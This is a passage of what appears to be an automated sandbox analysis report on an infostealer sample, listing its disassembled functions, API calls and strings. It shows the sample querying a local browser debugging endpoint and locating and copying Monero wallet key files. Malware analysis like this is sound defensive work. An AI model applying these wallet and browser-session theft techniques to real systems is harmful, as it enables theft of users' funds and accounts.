                                                                                                                                                                                                                                                          • Instruction ID: ea02acafc1560114a5124751bbdcd4c0ac15825620c5aa84dc3355a042dc4a28
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5a4fce1449d9a67d1a246572ff4039ae6d6a4a3f00d3a161e3f75d60ea6ab3a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74015876402926FBC733ABA1AD0C9DF3E6CFE4A362B144145F646910088B7E5641EBF5
                                                                                                                                                                                                                                                          Function 00FE7ECC Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 114networkfileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • InternetOpenA.WININET(WebSocketClient,00000001,00000000,00000000,00000000), ref: 00FE7EF4
                                                                                                                                                                                                                                                          • InternetOpenUrlA.WININET(00000000,http://localhost:9223/json,00000000,00000000,80000000,00000000), ref: 00FE7F25
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00FE7F36
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000), ref: 00FE7FA4
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00FE7FB4
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00FE7FC0
                                                                                                                                                                                                                                                            • Part of subcall function 00FEF54B: std::_Xinvalid_argument.LIBCPMT ref: 00FEF561
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$Open$FileReadXinvalid_argumentstd::_
                                                                                                                                                                                                                                                          • String ID: "webSocketDebuggerUrl":$"ws://$WebSocketClient$http://localhost:9223/json
                                                                                                                                                                                                                                                          • API String ID: 2589578820-1054772028
                                                                                                                                                                                                                                                          • Opcode ID: 459b9c0b31ea32e154ce881f6b8ea596d39a04c3bbc7129b20959c41f3fe1a19
                                                                                                                                                                                                                                                          • Instruction ID: 10c0c2d14bd99add12b802c859ae62f447339c5883b834ceb9357c1f62ac681a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 459b9c0b31ea32e154ce881f6b8ea596d39a04c3bbc7129b20959c41f3fe1a19
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B417672D042E9AEDB21EF61DC49EEA7779EB08354F0000A9F689E2145C7B95FC89F50
                                                                                                                                                                                                                                                          Function 00FFB413 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 00FFB447
                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 00FFB4C0
                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00FFB4DC
                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00FFB4F0
                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 00FFB4F9
                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00FFB509
                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00FFB527
                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00FFB537
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$PointerRead$HandleInformationSize
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2979504256-3916222277
                                                                                                                                                                                                                                                          • Opcode ID: a5393bbb2f373220f3e15426f37d0abbccfe15394f2c919f8b79ae7d2e743ead
                                                                                                                                                                                                                                                          • Instruction ID: 5e109931f56e2b93d1bcefb811e1a09bcbc8944209d5076d72555d496b480109
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5393bbb2f373220f3e15426f37d0abbccfe15394f2c919f8b79ae7d2e743ead
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 535102B1D0021CAFDB29DF99D881ABDBBB9FF04314F18442AE611E6261D7389D45DF10
                                                                                                                                                                                                                                                          Function 00FE1AA8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FE1ACC
                                                                                                                                                                                                                                                            • Part of subcall function 00FE1A41: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00FE1A55
                                                                                                                                                                                                                                                            • Part of subcall function 00FE1A41: HeapAlloc.KERNEL32(00000000), ref: 00FE1A5C
                                                                                                                                                                                                                                                            • Part of subcall function 00FE1A41: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00FE1AD9), ref: 00FE1A79
                                                                                                                                                                                                                                                            • Part of subcall function 00FE1A41: RegQueryValueExA.ADVAPI32(00FE1AD9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00FE1A94
                                                                                                                                                                                                                                                            • Part of subcall function 00FE1A41: RegCloseKey.ADVAPI32(00FE1AD9), ref: 00FE1A9D
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00FE1AE1
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FE1AEE
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.keys), ref: 00FE1B09
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00FE1C1A
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00FE1C8D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7074: CreateThread.KERNEL32(00000000,00000000,00FF6FA3,?,00000000,00000000), ref: 00FF7113
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7074: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00FF711B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                                                                                                                          • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                                                                                                          • API String ID: 615783205-3586502688
                                                                                                                                                                                                                                                          • Opcode ID: f4f03847859312ab337f169c9c131293a7db24ee859e4e76e0bf5a6848dfa9c8
                                                                                                                                                                                                                                                          • Instruction ID: 1ef67441a8311668d9840898de51fd8efae00b69178436c8d1fab15dd0970f70
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4f03847859312ab337f169c9c131293a7db24ee859e4e76e0bf5a6848dfa9c8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC511D72D4016E9BCF60BB65DD46AED7378AF00304F4144E1B708B7112DA796F89AF84
                                                                                                                                                                                                                                                          Function 00FEDD33 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109stringmemoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,76885460,?,00000000), ref: 00FEDD6F
                                                                                                                                                                                                                                                          • strchr.MSVCRT ref: 00FEDD81
                                                                                                                                                                                                                                                          • strchr.MSVCRT ref: 00FEDDA6
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FEDEAB), ref: 00FEDDC8
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEDDD5
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FEDEAB), ref: 00FEDDDC
                                                                                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 00FEDE23
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
                                                                                                                                                                                                                                                          • String ID: 0123456789ABCDEF
                                                                                                                                                                                                                                                          • API String ID: 453150750-2554083253
                                                                                                                                                                                                                                                          • Opcode ID: bf838c276ca3fd25cc250aec75184fc764b0613320a74dd7f4815eb802b3bf43
                                                                                                                                                                                                                                                          • Instruction ID: a877261a049525bfea26a4a69d6e4d3b1440a971c1b6fc5e252d45781537777d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf838c276ca3fd25cc250aec75184fc764b0613320a74dd7f4815eb802b3bf43
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30317072D002599FDF11DFE9DC49ADEBBB9AF08310F100129E901FB285DB76A908DB90
                                                                                                                                                                                                                                                          Function 00FFF3E2 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • UnDecorator::getArgumentList.LIBCMT ref: 00FFF407
                                                                                                                                                                                                                                                            • Part of subcall function 00FFEFA2: Replicator::operator[].LIBCMT ref: 00FFF025
                                                                                                                                                                                                                                                            • Part of subcall function 00FFEFA2: DName::operator+=.LIBCMT ref: 00FFF02D
                                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00FFF460
                                                                                                                                                                                                                                                          • DName::DName.LIBCMT ref: 00FFF4B8
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                                                                                                                                                          • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                                                                          • API String ID: 834187326-2211150622
                                                                                                                                                                                                                                                          • Opcode ID: 26e4f4600d23553c909f6ea47b6ee8a1767e6b671d6417342b6317fbc9d4dca4
                                                                                                                                                                                                                                                          • Instruction ID: 9f3b4910e931d8b7c9a5bddcfaa4b5d556e9404f83e888fa57968d92918a3c89
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26e4f4600d23553c909f6ea47b6ee8a1767e6b671d6417342b6317fbc9d4dca4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6217F316002099FCB11CF1CD4849B97BB4FF457A8B548094E989DB27ACB39D907EF54
                                                                                                                                                                                                                                                          Function 01000D7B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • UnDecorator::UScore.LIBCMT ref: 01000D85
                                                                                                                                                                                                                                                          • DName::DName.LIBCMT ref: 01000D91
                                                                                                                                                                                                                                                            • Part of subcall function 00FFEA5C: DName::doPchar.LIBCMT ref: 00FFEA8D
                                                                                                                                                                                                                                                          • UnDecorator::getScopedName.LIBCMT ref: 01000DD0
                                                                                                                                                                                                                                                          • DName::operator+=.LIBCMT ref: 01000DDA
                                                                                                                                                                                                                                                          • DName::operator+=.LIBCMT ref: 01000DE9
                                                                                                                                                                                                                                                          • DName::operator+=.LIBCMT ref: 01000DF5
                                                                                                                                                                                                                                                          • DName::operator+=.LIBCMT ref: 01000E02
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
